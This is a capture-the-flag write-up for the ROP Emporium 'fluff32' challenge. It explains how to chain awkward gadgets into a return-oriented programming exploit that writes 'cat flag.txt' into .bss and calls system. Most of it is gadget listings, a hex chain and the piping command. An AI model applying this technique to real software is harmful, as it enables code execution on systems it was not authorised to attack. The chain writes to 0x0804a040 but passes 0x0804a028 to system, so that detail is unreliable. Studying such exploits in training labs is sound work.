fluff
=====

Get the 32-bit `fluff` binary from the
[URL on ropemporium.com](https://ropemporium.com/binary/fluff32.zip):

    curl -O https://ropemporium.com/binary/fluff32.zip
    unzip fluff32.zip

This time, we've been given gadgets that aren't as obviously useful as before.
The `usefulGadgets` function is gone; instead, we have `questionableGadgets`:

    ;-- questionableGadgets:

    0x08048670      5f             pop edi
    0x08048671      31d2           xor edx, edx
    0x08048673      5e             pop esi
    0x08048674      bdbebafeca     mov ebp, 0xcafebabe
    0x08048679      c3             ret

    0x0804867a      5e             pop esi
    0x0804867b      31da           xor edx, ebx
    0x0804867d      5d             pop ebp
    0x0804867e      bfbebaadde     mov edi, 0xdeadbabe
    0x08048683      c3             ret

    0x08048684      bfefbeadde     mov edi, 0xdeadbeef
    0x08048689      87ca           xchg edx, ecx
    0x0804868b      5d             pop ebp
    0x0804868c      bad0cefade     mov edx, 0xdefaced0
    0x08048691      c3             ret

    0x08048692      5f             pop edi
    0x08048693      8911           mov dword [ecx], edx
    0x08048695      5d             pop ebp
    0x08048696      5b             pop ebx
    0x08048697      3019           xor byte [ecx], bl
    0x08048699      c3             ret

The goal is still to write "cat flag.txt" somewhere in memory, then call system,
so we'll need a gadget that does something like `mov [<reg1>] reg2` to write to
memory.  We've got just that in the last gadget above, but it's not the only
thing in the gadget. It also pops two registers and xor's a byte of the word we
just wrote to `[ecx]` with the low byte of the `ebx` register we just popped.
That won't cause us any problems if we make sure there are two words of junk on
the stack after the address of our gadget, and as long as the second one
contains `0x00` in the low byte, so that xor'ing with it is the identity.

The next question is how we can control `ecx` and `edx`. Gadget 3 above
effectively moves `ecx` into `edx`, so as long as we can control the latter, we
can also control the former. Again, that gadget also contains a `pop`, so we'll
need to make sure there's a word of junk on the stack after the gadget address.

We'll need to combine three different gadgets to control `edx`. First, we'll use
gadget 1 above to zero out `edx` (by xor'ing it with itself). Then we'll put a
value into it by xor'ing it with `ebx`. Before we do that, we'll need to put
something into `ebx`, so we'll need another gadget for that. Looking around, we
find this one in `_init()`:

    0x080483e1      5b             pop ebx
    0x080483e2      c3             ret

Combining all of the above, we get the following chain, which allows us to write
a word to an arbitrary location in writable memory. We'll write it to the `.bss`
section, whose address we can find using `rabin2 -S fluff32`.

    08048671    // xor edx,edx; pop esi
    00000000    // Junk to pop into esi
    080483e1    // pop ebx
    0804a040    // Address to write to: .bss
    0804867b    // xor edx,ebx; pop ebp
    00000000    // Junk to pop into ebp
    08048689    // xchg edx,ecx; pop ebp
    00000000    // Junk to pop into ebp
                // At this point, ecx contains the desired address
    08048671    // xor edx,edx; pop esi
    00000000    // Junk to pop into esi
    080483e1    // pop ebx
    20746163    // "cat flag.txt"[0:4], reversed for endianness
    0804867b    // xor edx,ebx; pop ebp
    00000000    // Junk to pop into ebp
    08048693    // mov dword [ecx],edx; pop ebp; pop ebx
    00000000    // Junk to pop into ebp
    00000000    // Junk to pop into ebx

We'll need to repeat this gadget four times: three to write each four-byte word
of the twelve-byte string "cat flag.txt" and one more to write a zero word to
ensure our string is null-terminated. Once we've done that all we need to do is
call system with the address of `.bss` as its first argument. We'll do that just
like we did in the previous few challenges:

    08048430    // system@plt
    ddccbbaa    // junk
    0804a028    // "cat flag.txt"

A complete working chain is available in `chain.hex`. As before, we can use it
with the following incantation:

    $ xxd -r -p chain.hex | xxd -e | xxd -r | ./fluff32
